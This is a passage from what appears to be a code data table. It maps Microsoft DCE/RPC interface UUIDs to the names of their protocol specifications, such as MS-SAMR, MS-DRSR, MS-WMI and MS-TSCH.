+'B0076FEC-A921-4034-A8BA-090BC6D03BDE':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'640038F1-D626-40D8-B52B-09660601D045':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'BB39E296-AD26-42C5-9890-5325333BB11E':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'B06A64E3-814E-4FF9-AFAC-597AD32517C7':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'A5ECFC73-0013-4A9E-951C-59BF9735FDDA':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'1396DE6F-A794-4B11-B93F-6B69A5B47BAE':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'DD6F0A28-248F-4DD3-AFE9-71AED8F685C4':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'52BA97E7-9364-4134-B9CB-F8415213BDD8':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'E2842C88-07C3-4EB0-B1A9-D3D95E76FEF2':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'312CC019-D5CD-4CA7-8C10-9E0A661F147E':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'345B026B-5802-4E38-AC75-795E08B0B83F':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'442931D5-E522-4E64-A181-74E98A4E1748':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'1B1C4D1C-ABC4-4D3A-8C22-547FBA3AA8A0':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'56E65EA5-CDFF-4391-BA76-006E42C2D746':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'E645744B-CAE5-4712-ACAF-13057F7195AF':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'FE7F99F9-1DFB-4AFB-9D00-6A8DD0AABF2C':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'81FE3594-2495-4C91-95BB-EB5785614EC7':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'F093FE3D-8131-4B73-A742-EF54C20B337B':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'28BC8D5E-CA4B-4F54-973C-ED9622D2B3AC':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'22E5386D-8B12-4BF0-B0EC-6A1EA419E366':'[MS-LREC]: Live Remote Event Capture (LREC) Protocol', +'12345778-1234-ABCD-EF00-0123456789AB':'[MS-LSAD]: Local Security Authority (Domain Policy) Remote Protocol', +'12345778-1234-ABCD-EF00-0123456789AB':'[MS-LSAT]: Local Security Authority (Translation Methods) Remote', +'708CCA10-9569-11D1-B2A5-0060977D8118':'[MS-MQDS]: Message Queuing (MSMQ):', +'77DF7A80-F298-11D0-8358-00A024C480A8':'[MS-MQDS]: Message Queuing (MSMQ):', +'76D12B80-3467-11D3-91FF-0090272F9EA3':'[MS-MQMP]: Message Queuing (MSMQ):', +'FDB3A030-065F-11D1-BB9B-00A024EA5525':'[MS-MQMP]: Message Queuing (MSMQ):', +'41208EE0-E970-11D1-9B9E-00E02C064C39':'[MS-MQMR]: Message Queuing (MSMQ):', +'1088A980-EAE5-11D0-8D9B-00A02453C337':'[MS-MQQP]: Message Queuing (MSMQ):', +'1A9134DD-7B39-45BA-AD88-44D01CA47F28':'[MS-MQRR]: Message Queuing (MSMQ):', +'17FDD703-1827-4E34-79D4-24A55C53BB37':'[MS-MSRP]: Messenger Service Remote Protocol', +'12345678-1234-ABCD-EF00-01234567CFFB':'[MS-NRPC]: Netlogon Remote Protocol', +'00020411-0000-0000-C000-000000000046':'[MS-OAUT]: OLE Automation Protocol', +'00020401-0000-0000-C000-000000000046':'[MS-OAUT]: OLE Automation Protocol', +'00020403-0000-0000-C000-000000000046':'[MS-OAUT]: OLE Automation Protocol', +'00020412-0000-0000-C000-000000000046':'[MS-OAUT]: OLE Automation Protocol', +'00020402-0000-0000-C000-000000000046':'[MS-OAUT]: OLE Automation Protocol', +'00020400-0000-0000-C000-000000000046':'[MS-OAUT]: OLE Automation Protocol', +'00020404-0000-0000-C000-000000000046':'[MS-OAUT]: OLE Automation Protocol', +'784B693D-95F3-420B-8126-365C098659F2':'[MS-OCSPA]: Microsoft OCSP Administration Protocol', +'AE33069B-A2A8-46EE-A235-DDFD339BE281':'[MS-PAN]: Print System Asynchronous Notification Protocol', +'0B6EDBFA-4A24-4FC6-8A23-942B1ECA65D1':'[MS-PAN]: Print System Asynchronous Notification Protocol', +'76F03F96-CDFD-44FC-A22C-64950A001209':'[MS-PAR]: Print System Asynchronous Remote Protocol', +'DA5A86C5-12C2-4943-AB30-7F74A813D853':'[MS-PCQ]: Performance Counter Query Protocol', +'03837510-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol', +'03837543-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol', +'03837533-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol', +'03837541-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol', +'03837544-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol', +'03837524-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol', +'0383753A-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol', +'03837534-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol', +'0383750B-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol', +'0383751A-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol', +'03837512-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol', +'0383753D-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol', +'03837506-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol', +'03837520-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol', +'038374FF-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol', +'03837514-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol', +'03837502-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol', +'03837516-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol', +'0B1C2170-5732-4E0E-8CD3-D9B16F3B84D7':'[MS-RAA]: Remote Authorization API Protocol', +'F120A684-B926-447F-9DF4-C966CB785648':'[MS-RAI]: Remote Assistance Initiation Protocol', +'833E4010-AFF7-4AC3-AAC2-9F24C1457BCE':'[MS-RAI]: Remote Assistance Initiation Protocol', +'833E4200-AFF7-4AC3-AAC2-9F24C1457BCE':'[MS-RAI]: Remote Assistance Initiation Protocol', +'3C3A70A7-A468-49B9-8ADA-28E11FCCAD5D':'[MS-RAI]: Remote Assistance Initiation Protocol', +'833E4100-AFF7-4AC3-AAC2-9F24C1457BCE':'[MS-RAI]: Remote Assistance Initiation Protocol', +'833E41AA-AFF7-4AC3-AAC2-9F24C1457BCE':'[MS-RAI]: Remote Assistance Initiation Protocol', +'C323BE28-E546-4C23-A81B-D6AD8D8FAC7B':'[MS-RAINPS]: Remote Administrative Interface:', +'83E05BD5-AEC1-4E58-AE50-E819C7296F67':'[MS-RAINPS]: Remote Administrative Interface:', +'45F52C28-7F9F-101A-B52B-08002B2EFABE':'[MS-RAIW]: Remote Administrative Interface:', +'811109BF-A4E1-11D1-AB54-00A0C91E9B45':'[MS-RAIW]: Remote Administrative Interface:', +'A35AF600-9CF4-11CD-A076-08002B2BD711':'[MS-RDPESC]: Remote Desktop Protocol:', +'12345678-1234-ABCD-EF00-0123456789AB':'[MS-RPRN]: Print System Remote Protocol', +'66A2DB21-D706-11D0-A37B-00C04FC9DA04':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management', +'66A2DB1B-D706-11D0-A37B-00C04FC9DA04':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management', +'66A2DB20-D706-11D0-A37B-00C04FC9DA04':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management', +'66A2DB22-D706-11D0-A37B-00C04FC9DA04':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management', +'8F09F000-B7ED-11CE-BBD2-00001A181CAD':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management', +'5FF9BDF6-BD91-4D8B-A614-D6317ACC8DD8':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management', +'20610036-FA22-11CF-9823-00A0C911E5DF':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management', +'67E08FC2-2984-4B62-B92E-FC1AAE64BBBB':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management', +'6139D8A4-E508-4EBB-BAC7-D7F275145897':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management', +'338CD001-2244-31F1-AAAA-900038001003':'[MS-RRP]: Windows Remote Registry Protocol', +'3BBED8D9-2C9A-4B21-8936-ACB2F995BE6C':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol', +'8DA03F40-3419-11D1-8FB1-00A024CB6019':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol', +'D61A27C6-8F53-11D0-BFA0-00A024151983':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol', +'081E7188-C080-4FF3-9238-29F66D6CABFD':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol', +'895A2C86-270D-489D-A6C0-DC2A9B35280E':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol', +'D02E4BE0-3419-11D1-8FB1-00A024CB6019':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol', +'DB90832F-6910-4D46-9F5E-9FD6BFA73903':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol', +'4E934F30-341A-11D1-8FB1-00A024CB6019':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol', +'879C8BBE-41B0-11D1-BE11-00C04FB6BF70':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol', +'00000000-0000-0000-C000-000000000046':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol', +'69AB7050-3059-11D1-8FAF-00A024CB6019':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol', +'7D07F313-A53F-459A-BB12-012C15B1846E':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol', +'BB39332C-BFEE-4380-AD8A-BADC8AFF5BB6':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol', +'B057DC50-3059-11D1-8FAF-00A024CB6019':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol', +'894DE0C0-0D55-11D3-A322-00C04FA321A1':'[MS-RSP]: Remote Shutdown Protocol', +'D95AFE70-A6D5-4259-822E-2C84DA1DDB0D':'[MS-RSP]: Remote Shutdown Protocol', +'12345778-1234-ABCD-EF00-0123456789AC':'[MS-SAMR]: Security Account Manager (SAM) Remote Protocol', +'01954E6B-9254-4E6E-808C-C9E05D007696':'[MS-SCMP]: Shadow Copy Management Protocol', +'FA7DF749-66E7-4986-A27F-E2F04AE53772':'[MS-SCMP]: Shadow Copy Management Protocol', +'214A0F28-B737-4026-B847-4F9E37D79529':'[MS-SCMP]: Shadow Copy Management Protocol', +'AE1C7110-2F60-11D3-8A39-00C04F72D8E3':'[MS-SCMP]: Shadow Copy Management Protocol', +'367ABB81-9844-35F1-AD32-98F038001003':'[MS-SCMR]: Service Control Manager Remote Protocol', +'4B324FC8-1670-01D3-1278-5A47BF6EE188':'[MS-SRVS]: Server Service Remote Protocol', +'CCD8C074-D0E5-4A40-92B4-D074FAA6BA28':'[MS-SWN]: Service Witness Protocol', +'1A1BB35F-ABB8-451C-A1AE-33D98F1BEF4A':'[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card', +'1C60A923-2D86-46AA-928A-E7F3E37577AF':'[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card', +'FDF8A2B9-02DE-47F4-BC26-AA85AB5E5267':'[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card', +'112B1DFF-D9DC-41F7-869F-D67FEE7CB591':'[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card', +'152EA2A8-70DC-4C59-8B2A-32AA3CA0DCAC':'[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card', +'16A18E86-7F6E-4C20-AD89-4FFC0DB7A96A':'[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card', +'3C745A97-F375-4150-BE17-5950F694C699':'[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card', +'2F5F6521-CA47-1068-B319-00DD010662DB':'[MS-TRP]: Telephony Remote Protocol', +'2F5F6520-CA46-1067-B319-00DD010662DA':'[MS-TRP]: Telephony Remote Protocol', +'1FF70682-0A51-30E8-076D-740BE8CEE98B':'[MS-TSCH]: Task Scheduler Service Remoting Protocol', +'378E52B0-C0A9-11CF-822D-00AA0051E40F':'[MS-TSCH]: Task Scheduler Service Remoting Protocol', +'86D35949-83C9-4044-B424-DB363231FD0C':'[MS-TSCH]: Task Scheduler Service Remoting Protocol', +'44E265DD-7DAF-42CD-8560-3CDB6E7A2729':'[MS-TSGU]: Terminal Services Gateway Server Protocol', +'034634FD-BA3F-11D1-856A-00A0C944138C':'[MS-TSRAP]: Telnet Server Remote Administration Protocol', +'497D95A6-2D27-4BF5-9BBD-A6046957133C':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface', +'11899A43-2B68-4A76-92E3-A3D6AD8C26CE':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface', +'5CA4A760-EBB1-11CF-8611-00A0245420ED':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface', +'BDE95FDF-EEE0-45DE-9E12-E5A61CD0D4FE':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface', +'484809D6-4239-471B-B5BC-61DF8C23AC48':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface', +'88143FD0-C28D-4B2B-8FEF-8D882F6A9390':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface', +'1257B580-CE2F-4109-82D6-A9459D0BF6BC':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface', +'53B46B02-C73B-4A3E-8DEE-B16B80672FC0':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface', +'DDE02280-12B3-4E0B-937B-6747F6ACB286':'[MS-UAMG]: Update Agent Management Protocol', +'112EDA6B-95B3-476F-9D90-AEE82C6B8181':'[MS-UAMG]: Update Agent Management Protocol', +'144FE9B0-D23D-4A8B-8634-FB4457533B7A':'[MS-UAMG]: Update Agent Management Protocol', +'70CF5C82-8642-42BB-9DBC-0CFD263C6C4F':'[MS-UAMG]: Update Agent Management Protocol', +'49EBD502-4A96-41BD-9E3E-4C5057F4250C':'[MS-UAMG]: Update Agent Management Protocol', +'7C907864-346C-4AEB-8F3F-57DA289F969F':'[MS-UAMG]: Update Agent Management Protocol', +'46297823-9940-4C09-AED9-CD3EA6D05968':'[MS-UAMG]: Update Agent Management Protocol', +'4CBDCB2D-1589-4BEB-BD1C-3E582FF0ADD0':'[MS-UAMG]: Update Agent Management Protocol', +'8F45ABF1-F9AE-4B95-A933-F0F66E5056EA':'[MS-UAMG]: Update Agent Management Protocol', +'6A92B07A-D821-4682-B423-5C805022CC4D':'[MS-UAMG]: Update Agent Management Protocol', +'54A2CB2D-9A0C-48B6-8A50-9ABB69EE2D02':'[MS-UAMG]: Update Agent Management Protocol', +'0D521700-A372-4BEF-828B-3D00C10ADEBD':'[MS-UAMG]: Update Agent Management Protocol', +'C2BFB780-4539-4132-AB8C-0A8772013AB6':'[MS-UAMG]: Update Agent Management Protocol', +'1518B460-6518-4172-940F-C75883B24CEB':'[MS-UAMG]: Update Agent Management Protocol', +'81DDC1B8-9D35-47A6-B471-5B80F519223B':'[MS-UAMG]: Update Agent Management Protocol', +'BC5513C8-B3B8-4BF7-A4D4-361C0D8C88BA':'[MS-UAMG]: Update Agent Management Protocol', +'C1C2F21A-D2F4-4902-B5C6-8A081C19A890':'[MS-UAMG]: Update Agent Management Protocol', +'07F7438C-7709-4CA5-B518-91279288134E':'[MS-UAMG]: Update Agent Management Protocol', +'C97AD11B-F257-420B-9D9F-377F733F6F68':'[MS-UAMG]: Update Agent Management Protocol', +'3A56BFB8-576C-43F7-9335-FE4838FD7E37':'[MS-UAMG]: Update Agent Management Protocol', +'615C4269-7A48-43BD-96B7-BF6CA27D6C3E':'[MS-UAMG]: Update Agent Management Protocol', +'004C6A2B-0C19-4C69-9F5C-A269B2560DB9':'[MS-UAMG]: Update Agent Management Protocol', +'7366EA16-7A1A-4EA2-B042-973D3E9CD99B':'[MS-UAMG]: Update Agent Management Protocol', +'A376DD5E-09D4-427F-AF7C-FED5B6E1C1D6':'[MS-UAMG]: Update Agent Management Protocol', +'23857E3C-02BA-44A3-9423-B1C900805F37':'[MS-UAMG]: Update Agent Management Protocol', +'B383CD1A-5CE9-4504-9F63-764B1236F191':'[MS-UAMG]: Update Agent Management Protocol', +'76B3B17E-AED6-4DA5-85F0-83587F81ABE3':'[MS-UAMG]: Update Agent Management Protocol', +'0BB8531D-7E8D-424F-986C-A0B8F60A3E7B':'[MS-UAMG]: Update Agent Management Protocol', +'91CAF7B0-EB23-49ED-9937-C52D817F46F7':'[MS-UAMG]: Update Agent Management Protocol', +'673425BF-C082-4C7C-BDFD-569464B8E0CE':'[MS-UAMG]: Update Agent Management Protocol', +'EFF90582-2DDC-480F-A06D-60F3FBC362C3':'[MS-UAMG]: Update Agent Management Protocol', +'D9A59339-E245-4DBD-9686-4D5763E39624':'[MS-UAMG]: Update Agent Management Protocol', +'9B0353AA-0E52-44FF-B8B0-1F7FA0437F88':'[MS-UAMG]: Update Agent Management Protocol', +'503626A3-8E14-4729-9355-0FE664BD2321':'[MS-UAMG]: Update Agent Management Protocol', +'85713FA1-7796-4FA2-BE3B-E2D6124DD373':'[MS-UAMG]: Update Agent Management Protocol', +'816858A4-260D-4260-933A-2585F1ABC76B':'[MS-UAMG]: Update Agent Management Protocol', +'27E94B0D-5139-49A2-9A61-93522DC54652':'[MS-UAMG]: Update Agent Management Protocol', +'E7A4D634-7942-4DD9-A111-82228BA33901':'[MS-UAMG]: Update Agent Management Protocol', +'D40CFF62-E08C-4498-941A-01E25F0FD33C':'[MS-UAMG]: Update Agent Management Protocol', +'ED8BFE40-A60B-42EA-9652-817DFCFA23EC':'[MS-UAMG]: Update Agent Management Protocol', +'A7F04F3C-A290-435B-AADF-A116C3357A5C':'[MS-UAMG]: Update Agent Management Protocol', +'4A2F5C31-CFD9-410E-B7FB-29A653973A0F':'[MS-UAMG]: Update Agent Management Protocol', +'BE56A644-AF0E-4E0E-A311-C1D8E695CBFF':'[MS-UAMG]: Update Agent Management Protocol', +'918EFD1E-B5D8-4C90-8540-AEB9BDC56F9D':'[MS-UAMG]: Update Agent Management Protocol', +'04C6895D-EAF2-4034-97F3-311DE9BE413A':'[MS-UAMG]: Update Agent Management Protocol', +'15FC031C-0652-4306-B2C3-F558B8F837E2':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'4DBCEE9A-6343-4651-B85F-5E75D74D983C':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'1E062B84-E5E6-4B4B-8A25-67B81E8F13E8':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'2ABD757F-2851-4997-9A13-47D2A885D6CA':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'9CBE50CA-F2D2-4BF4-ACE1-96896B729625':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'4DAA0135-E1D1-40F1-AAA5-3CC1E53221C3':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'3858C0D5-0F35-4BF5-9714-69874963BC36':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'40F73C8B-687D-4A13-8D96-3D7F2E683936':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'8F4B2F5D-EC15-4357-992F-473EF10975B9':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'FC5D23E8-A88B-41A5-8DE0-2D2F73C5A630':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'B07FEDD4-1682-4440-9189-A39B55194DC5':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'72AE6713-DCBB-4A03-B36B-371F6AC6B53D':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'B6B22DA8-F903-4BE7-B492-C09D875AC9DA':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'538684E0-BA3D-4BC0-ACA9-164AFF85C2A9':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'75C8F324-F715-4FE3-A28E-F9011B61A4A1':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'90681B1D-6A7F-48E8-9061-31B7AA125322':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'9882F547-CFC3-420B-9750-00DFBEC50662':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'83BFB87F-43FB-4903-BAA6-127F01029EEC':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'EE2D5DED-6236-4169-931D-B9778CE03DC6':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'9723F420-9355-42DE-AB66-E31BB15BEEAC':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'4AFC3636-DB01-4052-80C3-03BBCB8D3C69':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'D99BDAAE-B13A-4178-9FDB-E27F16B4603E':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'D68168C9-82A2-4F85-B6E9-74707C49A58F':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'13B50BFF-290A-47DD-8558-B7C58DB1A71A':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'6E6F6B40-977C-4069-BDDD-AC710059F8C0':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'9AA58360-CE33-4F92-B658-ED24B14425B8':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'E0393303-90D4-4A97-AB71-E9B671EE2729':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'07E5C822-F00C-47A1-8FCE-B244DA56FD06':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'8326CD1D-CF59-4936-B786-5EFC08798E25':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'1BE2275A-B315-4F70-9E44-879B3A2A53F2':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'0316560B-5DB4-4ED9-BBB5-213436DDC0D9':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'14FBE036-3ED7-4E10-90E9-A5FF991AFF01':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'3B69D7F5-9D94-4648-91CA-79939BA263BF':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'D5D23B6D-5A55-4492-9889-397A3C2D2DBC':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'88306BB2-E71F-478C-86A2-79DA200A0F11':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'118610B7-8D94-4030-B5B8-500889788E4E':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'0AC13689-3134-47C6-A17C-4669216801BE':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'0818A8EF-9BA9-40D8-A6F9-E22833CC771E':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'6788FAF9-214E-4B85-BA59-266953616E09':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'B481498C-8354-45F9-84A0-0BDD2832A91F':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'10C5E575-7984-4E81-A56B-431F5F92AE42':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'38A0A9AB-7CC8-4693-AC07-1F28BD03C3DA':'[MS-VDS]: Virtual Disk Service (VDS) Protocol', +'8FB6D884-2388-11D0-8C35-00C04FDA2795':'[MS-W32T]: W32Time Remote Protocol', +'5422FD3A-D4B8-4CEF-A12E-E87D4CA22E90':'[MS-WCCE]: Windows Client Certificate Enrollment Protocol', +'D99E6E70-FC88-11D0-B498-00A0C90312F3':'[MS-WCCE]: Windows Client Certificate Enrollment Protocol', +'1A927394-352E-4553-AE3F-7CF4AAFCA620':'[MS-WDSC]: Windows Deployment Services Control Protocol', +'6BFFD098-A112-3610-9833-46C3F87E345A':'[MS-WKST]: Workstation Service Remote Protocol', +'F1E9C5B2-F59B-11D2-B362-00105A1F8177':'[MS-WMI]: Windows Management Instrumentation Remote Protocol', +'423EC01E-2E35-11D2-B604-00104B703EFD':'[MS-WMI]: Windows Management Instrumentation Remote Protocol', +'9556DC99-828C-11CF-A37E-00AA003240C7':'[MS-WMI]: Windows Management Instrumentation Remote Protocol', +'F309AD18-D86A-11D0-A075-00C04FB68820':'[MS-WMI]: Windows Management Instrumentation Remote Protocol', +'9A653086-174F-11D2-B5F9-00104B703EFD':'[MS-WMI]: Windows Management Instrumentation Remote Protocol', +'D4781CD6-E5D3-44DF-AD94-930EFE48A887':'[MS-WMI]: Windows Management Instrumentation Remote Protocol', +'44ACA674-E8FC-11D0-A07C-00C04FB68820':'[MS-WMI]: Windows Management Instrumentation Remote Protocol', +'541679AB-2E5F-11D3-B34E-00104BCC4B4A':'[MS-WMI]: Windows Management Instrumentation Remote Protocol', +'027947E1-D731-11CE-A357-000000000001':'[MS-WMI]: Windows Management Instrumentation Remote Protocol', +'A359DEC5-E813-4834-8A2A-BA7F1D777D76':'[MS-WMI]: Windows Management Instrumentation Remote Protocol', +'C49E32C6-BC8B-11D2-85D4-00105A1F8304':'[MS-WMI]: Windows Management Instrumentation Remote Protocol', +'C49E32C7-BC8B-11D2-85D4-00105A1F8304':'[MS-WMI]: Windows Management Instrumentation Remote Protocol', +'2C9273E0-1DC3-11D3-B364-00105A1F8177':'[MS-WMI]: Windows Management Instrumentation Remote Protocol', +'7C857801-7381-11CF-884D-00AA004B2E24':'[MS-WMI]: Windows Management Instrumentation Remote Protocol', +'DC12A681-737F-11CF-884D-00AA004B2E24':'[MS-WMI]: Windows Management Instrumentation Remote Protocol', +'8BC3F05E-D86B-11D0-A075-00C04FB68820':'[MS-WMI]: Windows Management Instrumentation Remote Protocol', +'44ACA675-E8FC-11D0-A07C-00C04FB68820':'[MS-WMI]: Windows Management Instrumentation Remote Protocol', +'1C1C45EE-4395-11D2-B60B-00104B703EFD':'[MS-WMI]: Windows Management Instrumentation Remote Protocol', +'674B6698-EE92-11D0-AD71-00C04FD8FDFF':'[MS-WMI]: Windows Management Instrumentation Remote Protocol', +'FC910418-55CA-45EF-B264-83D4CE7D30E0':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol', +'C5CEBEE2-9DF5-4CDD-A08C-C2471BC144B4':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol', +'F31931A9-832D-481C-9503-887A0E6A79F0':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol', +'21546AE8-4DA5-445E-987F-627FEA39C5E8':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol', +'BC681469-9DD9-4BF4-9B3D-709F69EFE431':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol', +'4F7CA01C-A9E5-45B6-B142-2332A1339C1D':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol', +'2A3EB639-D134-422D-90D8-AAA1B5216202':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol', +'59602EB6-57B0-4FD8-AA4B-EBF06971FE15':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol', +'481E06CF-AB04-4498-8FFE-124A0A34296D':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol', +'E8BCFFAC-B864-4574-B2E8-F1FB21DFDC18':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol', +'943991A5-B3FE-41FA-9696-7F7B656EE34B':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol', +'BBA9CB76-EB0C-462C-AA1B-5D8C34415701':'[MS-ADTS]: Active Directory Technical Specification', +'906B0CE0-C70B-1067-B317-00DD010662DA':'[MS-CMPO]: MSDTC Connection Manager:', +'E3514235-4B06-11D1-AB04-00C04FC2DCD2':'[MS-DRSR]: Directory Replication Service (DRS) Remote Protocol', +'F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C':'[MS-EVEN6]: EventLog Remoting Protocol', +'D049B186-814F-11D1-9A3C-00C04FC9B232':'[MS-FRS1]: File Replication Service Protocol', +'F5CC59B4-4264-101A-8C59-08002B2F8426':'[MS-FRS1]: File Replication Service Protocol', +'5A7B91F8-FF00-11D0-A9B2-00C04FB6E6FC':'[MS-MSRP]: Messenger Service Remote Protocol', +'F5CC5A18-4264-101A-8C59-08002B2F8426':'[MS-NSPI]: Name Service Provider Interface (NSPI) Protocol', +'E33C0CC4-0482-101A-BC0C-02608C6BA218':'[MS-RPCL]: Remote Procedure Call Location Services Extensions', +'AFA8BD80-7D8A-11C9-BEF4-08002B102989':'[MS-RPCE]: Remote Management Interface', +'00000134-0000-0000-C000-000000000046':'[MS-DCOM]: Distributed Component Object Model (DCOM)', +'18F70770-8E64-11CF-9AF1-0020AF6E72F4':'[MS-DCOM]: Distributed Component Object Model (DCOM)', +'958F92D8-DA20-467A-BBE3-65E7E9B4EDCF':'[MS-TSGU]: Terminal Services Gateway Server Management Interface', +'6050B110-CE87-4126-A114-50AEFCFC95F8':'[MS-DCOM]: Distributed Component Object Model (DCOM)', +'1544F5E0-613C-11D1-93DF-00C04FD7BD09':'[MS-OXABREF]: Address Book Name Service Provider Interface (NSPI) Referral Protocol', +'A4F1DB00-CA47-1067-B31F-00DD010662DA':'[MS-OXCRPC]: Wire Format Protocol', 